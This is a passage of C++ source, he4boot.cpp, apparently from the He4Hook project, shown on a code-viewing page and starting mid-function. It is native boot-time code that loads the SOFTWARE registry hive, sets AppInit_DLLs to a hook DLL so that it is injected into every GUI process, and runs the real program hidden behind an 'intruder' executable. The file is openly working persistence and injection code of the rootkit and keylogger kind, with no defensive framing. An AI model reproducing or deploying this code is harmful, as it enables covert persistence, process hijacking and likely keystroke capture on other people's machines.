?? he4boot.cpp
字號(hào):
#ifdef __HE4_BOOT_DEBUG
else
{
BEDisplayString(L"\n Class He4NDISBootDriver don`t created !!!");
}
#endif //__HE4_BOOT_DEBUG
#endif //__HE4_BOOT_INSTALL_NDIS
}
void InstallHookDLL(PWSTR pDLLName, PPEB Peb)
{
UNICODE_STRING str, GroupValue, KeyFile, UniWinDir;
NTSTATUS NtStatus;
HANDLE hKey/*, hKeyLoad*/;
OBJECT_ATTRIBUTES obj, KeyObj;
ULONG Disposition/*, dwData*/;
BOOLEAN bEnable;
WCHAR DosPathToKeyFile[512] = L"c:\\winnt\\system32\\config\\software";
WCHAR WinDir[512];
if(!pDLLName)
{
#ifdef __HE4_BOOT_DEBUG
BEDisplayString(L"\n He4Hook key Dll name is NULL !!!");
#endif //__HE4_BOOT_DEBUG
return;
}
#ifdef __HE4_BOOT_DEBUG
else
{
BEDisplayString(L"\n He4Hook key Dll name is ");
BEDisplayString(pDLLName);
BEDisplayString(L" !!!");
}
#endif //__HE4_BOOT_DEBUG
if(Peb)
{
RtlInitUnicodeString(&str, L"windir");
//RtlInitUnicodeString(&UniWinDir, L" ");
UniWinDir.Buffer = WinDir;
UniWinDir.Length = 0;
UniWinDir.MaximumLength = sizeof(WinDir);
if(Peb->pi->EnvironmentBlock)
{
NtStatus = RtlQueryEnvironmentVariable_U(Peb->pi->EnvironmentBlock, &str, &UniWinDir);
#ifdef __HE4_BOOT_DEBUG
if(!NT_SUCCESS(NtStatus))
{
BEDisplayString(L"\n He4Hook - WINDIR not found into EnvironmentBlock!!!");
}
else
{
BEDisplayString(L"\n ");
NtDisplayString(&UniWinDir);
memset(DosPathToKeyFile, 0, sizeof(DosPathToKeyFile));
memcpy(DosPathToKeyFile, UniWinDir.Buffer, UniWinDir.Length);
memcpy(((CHAR*)DosPathToKeyFile)+UniWinDir.Length, L"\\system32\\config\\software", sizeof(L"\\system32\\config\\software"));
BEDisplayString(L"\n ");
BEDisplayString(DosPathToKeyFile);
}
#else
if(NT_SUCCESS(NtStatus))
{
memset(DosPathToKeyFile, 0, sizeof(DosPathToKeyFile));
memcpy(DosPathToKeyFile, UniWinDir.Buffer, UniWinDir.Length);
memcpy(((CHAR*)DosPathToKeyFile)+UniWinDir.Length, L"\\system32\\config\\software", sizeof(L"\\system32\\config\\software"));
}
#endif //__HE4_BOOT_DEBUG
}
#ifdef __HE4_BOOT_DEBUG
else
{
BEDisplayString(L"\n He4Hook - EnvironmentBlock is NULL!!!");
}
#endif //__HE4_BOOT_DEBUG
}
RtlInitUnicodeString(&str, L"\\Registry\\Machine");
InitializeObjectAttributes(&obj, &str, OBJ_CASE_INSENSITIVE, NULL, NULL);
NtStatus = NtOpenKey(&hKey, KEY_ALL_ACCESS, &obj);
if(!NT_SUCCESS(NtStatus))
{
#ifdef __HE4_BOOT_DEBUG
BEDisplayString(L"\n He4Hook key \\Registry\\Machine for DLL don`t opened !!!");
#endif //__HE4_BOOT_DEBUG
return;
}
RtlAdjustPrivilege(SE_RESTORE_PRIVILEGE, TRUE, FALSE, &bEnable);
RtlDosPathNameToNtPathName_U(DosPathToKeyFile, &KeyFile, NULL, NULL);
InitializeObjectAttributes(&obj, &KeyFile, OBJ_CASE_INSENSITIVE, NULL, NULL);
RtlInitUnicodeString(&str, L"SOFTWARE");
InitializeObjectAttributes(&KeyObj, &str, OBJ_CASE_INSENSITIVE, hKey, NULL);
NtStatus = NtLoadKey(&KeyObj, &obj);
if(!NT_SUCCESS(NtStatus))
{
#ifdef __HE4_BOOT_DEBUG
BEDisplayString(L"\n He4Hook key \\Registry\\Machine\\SOFTWARE for DLL don`t loaded !!!");
#endif //__HE4_BOOT_DEBUG
NtClose(hKey);
return;
}
NtClose(hKey);
#ifdef __HE4_BOOT_DEBUG
BEDisplayString(L"\n He4Hook key \\Registry\\Machine\\SOFTWARE for DLL loaded OK!!!");
#endif //__HE4_BOOT_DEBUG
/************************************************************************/
RtlInitUnicodeString(&str, L"\\Registry\\Machine\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows");
InitializeObjectAttributes(&obj, &str, OBJ_CASE_INSENSITIVE, NULL, NULL);
NtStatus = NtCreateKey(&hKey, KEY_ALL_ACCESS, &obj, 0, NULL, REG_OPTION_VOLATILE, &Disposition);
if(!NT_SUCCESS(NtStatus))
{
#ifdef __HE4_BOOT_DEBUG
BEDisplayString(L"\n He4Hook key for DLL don`t created !!!");
#endif //__HE4_BOOT_DEBUG
return;
}
#ifdef __HE4_BOOT_DEBUG
else
{
BEDisplayString(L"\n He4Hook key for DLL created !!!");
}
#endif //__HE4_BOOT_DEBUG
RtlInitUnicodeString(&str, L"AppInit_DLLs");
RtlInitUnicodeString(&GroupValue, pDLLName);//L"HookKey.dll");
NtStatus = NtSetValueKey(hKey, &str, 0, REG_SZ, GroupValue.Buffer, GroupValue.Length+sizeof(WCHAR));
#ifdef __HE4_BOOT_DEBUG
if(!NT_SUCCESS(NtStatus))
{
BEDisplayString(L"\n He4Hook - \"AppInit_DLLs: HookKey.dll\" set value ERROR!!!");
}
else
{
BEDisplayString(L"\n He4Hook - \"AppInit_DLLs: HookKey.dll\" set value OK!!!");
}
#endif //__HE4_BOOT_DEBUG
NtClose(hKey);
RtlInitUnicodeString(&str, L"\\Registry\\Machine");
InitializeObjectAttributes(&obj, &str, OBJ_CASE_INSENSITIVE, NULL, NULL);
NtStatus = NtOpenKey(&hKey, KEY_ALL_ACCESS, &obj);
if(!NT_SUCCESS(NtStatus))
{
return;
}
RtlAdjustPrivilege(SE_RESTORE_PRIVILEGE, TRUE, FALSE, &bEnable);
RtlInitUnicodeString(&str, L"SOFTWARE");
InitializeObjectAttributes(&KeyObj, &str, OBJ_CASE_INSENSITIVE, hKey, NULL);
NtStatus = NtUnloadKey(&KeyObj);
#ifdef __HE4_BOOT_DEBUG
if(!NT_SUCCESS(NtStatus))
{
BEDisplayString(L"\n He4Hook - NtUnloadKey ERROR!!!");
}
else
{
BEDisplayString(L"\n He4Hook - NtUnloadKey OK!!!");
}
#endif //__HE4_BOOT_DEBUG
NtClose(hKey);
}
VOID BEDisplayString(PWSTR lpszString)
{
UNICODE_STRING str;
if(lpszString)
{
RtlInitUnicodeString(&str, lpszString);
NtDisplayString(&str);
WriteLog(lpszString, 2*(wcslen(lpszString)+1));
}
}
VOID RtlExitUserProcess(ULONG ExitCode)
{
RtlAcquirePebLock();
NtTerminateProcess(0, ExitCode);
LdrShutdownProcess();
NtTerminateProcess((HANDLE)0xffffffff/*NtCurrentProcess()*/, ExitCode);
#ifdef __HE4_BOOT_DEBUG
BEDisplayString(L"\n RtlExitUserProcess ERROR");
#endif //__HE4_BOOT_DEBUG
RtlReleasePebLock();
}
BOOLEAN CheckFileExist(PWSTR lpszFileName, BOOLEAN bFullName)
{
WCHAR FullFileName[512] = {0};
UNICODE_STRING FileNameUnicodeString;
OBJECT_ATTRIBUTES objectAttributes;
IO_STATUS_BLOCK ioStatus;
NTSTATUS ntStatus;
HANDLE hFile;
BOOLEAN bRet = FALSE;
ULONG SizeFileName = 0, WinDir = 0;
while(lpszFileName[SizeFileName] != UNICODE_NULL)
SizeFileName++;
SizeFileName = SizeFileName*2;
if(bFullName)
{
memcpy(FullFileName, lpszFileName, SizeFileName+sizeof(WCHAR));
}
else
{
if((WinDir = GetSystemDirectory(FullFileName, sizeof(FullFileName))))
{
memcpy(((CHAR*)FullFileName+WinDir), L"\\", sizeof(L"\\"));
memcpy(((CHAR*)FullFileName+WinDir+sizeof(WCHAR)), lpszFileName, SizeFileName+sizeof(WCHAR));
#ifdef __HE4_BOOT_DEBUG
BEDisplayString(L"\n\n WindowsDirectory: \n");
BEDisplayString(FullFileName);
BEDisplayString(L"\n\n");
#endif //__HE4_BOOT_DEBUG
}
else
{
memcpy(FullFileName, lpszFileName, SizeFileName+sizeof(WCHAR));
}
}
//RtlInitUnicodeString(&FileNameUnicodeString, FullFileName);
RtlDosPathNameToNtPathName_U(FullFileName, &FileNameUnicodeString, NULL, NULL);
#ifdef __HE4_BOOT_DEBUG
BEDisplayString(L" WindowsDirectoryUNI: \n");
NtDisplayString(&FileNameUnicodeString);
BEDisplayString(L"\n\n");
#endif //__HE4_BOOT_DEBUG
InitializeObjectAttributes(&objectAttributes, &FileNameUnicodeString,
OBJ_CASE_INSENSITIVE, NULL, NULL);
ntStatus = NtCreateFile(&hFile, FILE_READ_DATA,
&objectAttributes, &ioStatus, NULL,
FILE_ATTRIBUTE_NORMAL, FILE_SHARE_READ,
FILE_OPEN, 0, NULL, 0);
if(NT_SUCCESS(ntStatus))
{
bRet = TRUE;
NtClose(hFile);
}
return bRet;
}
void OpenLog(void)
{
UNICODE_STRING FileNameUnicodeString;
OBJECT_ATTRIBUTES objectAttributes;
IO_STATUS_BLOCK ioStatus;
if (hFileLog != 0)
return;
RtlDosPathNameToNtPathName_U(L"He4Boot.log", &FileNameUnicodeString, NULL, NULL);
InitializeObjectAttributes(&objectAttributes, &FileNameUnicodeString,
OBJ_CASE_INSENSITIVE, NULL, NULL);
NtCreateFile(&hFileLog, FILE_WRITE_DATA | SYNCHRONIZE,
&objectAttributes, &ioStatus, NULL,
FILE_ATTRIBUTE_NORMAL, FILE_SHARE_READ,
FILE_OPEN_IF, FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0);
}
void CloseLog(void)
{
if (hFileLog != 0)
NtClose(hFileLog);
hFileLog = 0;
}
void WriteLog(void* pBuffer, ULONG dwSize)
{
IO_STATUS_BLOCK ioStatus;
NtWriteFile(hFileLog, 0, 0, 0, &ioStatus, pBuffer, dwSize, 0, 0);
}
ULONG GetSystemDirectory(PWSTR lpBuffer, ULONG uSize)
{
PPEB Peb = NtCurrentTeb()->peb;
UNICODE_STRING str, UniWinDir;
ULONG Ret = 0, SizeCopy;
NTSTATUS NtStatus;
WCHAR WinDir[512];
if(!lpBuffer || ! uSize) return Ret;
if(Peb)
{
RtlInitUnicodeString(&str, L"windir");
//RtlInitUnicodeString(&UniWinDir, L" ");
UniWinDir.Buffer = WinDir;
UniWinDir.Length = 0;
UniWinDir.MaximumLength = sizeof(WinDir);
if(Peb->pi->EnvironmentBlock)
{
NtStatus = RtlQueryEnvironmentVariable_U(Peb->pi->EnvironmentBlock, &str, &UniWinDir);
if(NT_SUCCESS(NtStatus))
{
memset(lpBuffer, 0, uSize);
SizeCopy = UniWinDir.Length;
if(SizeCopy >= uSize)
SizeCopy = uSize - sizeof(WCHAR);
memcpy(lpBuffer, UniWinDir.Buffer, SizeCopy);
if((uSize-SizeCopy) > 2)
memcpy(((CHAR*)lpBuffer)+SizeCopy, L"\\system32", sizeof(L"\\system32") < (uSize-SizeCopy) ? sizeof(L"\\system32") : ((uSize-SizeCopy) - sizeof(WCHAR)));
}
}
#ifdef __HE4_BOOT_DEBUG
else
{
BEDisplayString(L"\n He4Hook - EnvironmentBlock is NULL!!!");
}
#endif //__HE4_BOOT_DEBUG
}
Ret = 0;
while(lpBuffer[Ret] != UNICODE_NULL)
Ret++;
return 2*Ret;
}
void StartRealProcess(PWSTR IntruderProcessName)
{
if(!IntruderProcessName) return;
PPEB Peb = NtCurrentTeb()->peb;
NTSTATUS NtStatus;
PWSTR pCommandLine = 0, pPtrName;
ULONG SizeCommandLine = 0;
PPROCESS_PARAMETRS pProcessParam = 0;
RTL_PROCESS_INFORMATION pi;
UNICODE_STRING UniDOSProcName, UniProcName, UniRealCommandLine;
BOOLEAN bEnable;
RtlNormalizeProcessParams(Peb->pi);
pPtrName = IntruderProcessName + wcslen(IntruderProcessName);
while(*pPtrName != L'\\' && pPtrName != IntruderProcessName)
pPtrName--;
if(pPtrName != IntruderProcessName)
pPtrName++;
RtlAdjustPrivilege(SE_SYSTEM_ENVIRONMENT_PRIVILEGE, TRUE, FALSE, &bEnable);
pCommandLine = 0;
SizeCommandLine = Peb->pi->CommandLine.Length + sizeof(WCHAR);
NtStatus = NtAllocateVirtualMemory((HANDLE)-1, (PVOID*)&pCommandLine, 0, &SizeCommandLine, MEM_COMMIT, PAGE_READWRITE);
if(NT_SUCCESS(NtStatus))
{
memset(pCommandLine, 0, SizeCommandLine);
memcpy(pCommandLine, Peb->pi->CommandLine.Buffer, Peb->pi->CommandLine.Length);
//memcpy(&pCommandLine[wcslen(IntruderProcessName)-5], L"_", 2*wcslen(L"_"));
memcpy(&pCommandLine[wcslen(IntruderProcessName)-3], L"ext", 2*wcslen(L"ext"));
//wcscpy(&pCommandLine[(ULONG)(pPtrName-IntruderProcessName)], L"child.exe");
RtlInitUnicodeString(&UniRealCommandLine, pCommandLine);
RtlInitUnicodeString(&UniDOSProcName, pPtrName); //L"child.exe"
//memcpy(&UniDOSProcName.Buffer[wcslen(IntruderProcessName)-5], L"_", 2*wcslen(L"_"));
memcpy(&UniDOSProcName.Buffer[wcslen(pPtrName)-3], L"ext", 2*wcslen(L"ext"));
RtlDosPathNameToNtPathName_U(UniDOSProcName.Buffer, &UniProcName, NULL, NULL);
#ifdef __HE4_BOOT_DEBUG
BEDisplayString(L"\n Real DOS process name:\n ");
BEDisplayString(UniDOSProcName.Buffer);
BEDisplayString(L"\n Real process name:\n ");
BEDisplayString(UniProcName.Buffer);
BEDisplayString(L"\n Real command line:\n ");
BEDisplayString(pCommandLine);
#endif //__HE4_BOOT_DEBUG
RtlCreateProcessParameters(&pProcessParam, &UniProcName, NULL, NULL,
&UniRealCommandLine, NULL, NULL, NULL, NULL, NULL);
NtStatus = RtlCreateUserProcess(&UniProcName, OBJ_CASE_INSENSITIVE, pProcessParam,
NULL, NULL, NULL, FALSE, NULL, NULL, &pi);
if(NT_SUCCESS(NtStatus))
{
#ifdef __HE4_BOOT_DEBUG
BEDisplayString(L"\n RtlCreateUserProcess: OK!!!\n ");
#endif //__HE4_BOOT_DEBUG
NtResumeThread(pi.ThreadHandle, NULL);
NtWaitForSingleObject(pi.ProcessHandle, FALSE, NULL);
}
#ifdef __HE4_BOOT_DEBUG
else
{
WCHAR Buf[255];
BEDisplayString(L"\n RtlCreateUserProcess: ERROR!!! ");
swprintf(Buf, L" NtStatus = %08X\n", NtStatus);
BEDisplayString(Buf);
}
#endif //__HE4_BOOT_DEBUG
SizeCommandLine = 0;
NtStatus = NtFreeVirtualMemory((HANDLE)-1, (PVOID*)&pCommandLine, &SizeCommandLine, MEM_RELEASE);
}
}?? 快捷鍵說明
復(fù)制代碼
Ctrl + C
搜索代碼
Ctrl + F
全屏模式
F11
切換主題
Ctrl + Shift + D
顯示快捷鍵
?
增大字號(hào)
Ctrl + =
減小字號(hào)
Ctrl + -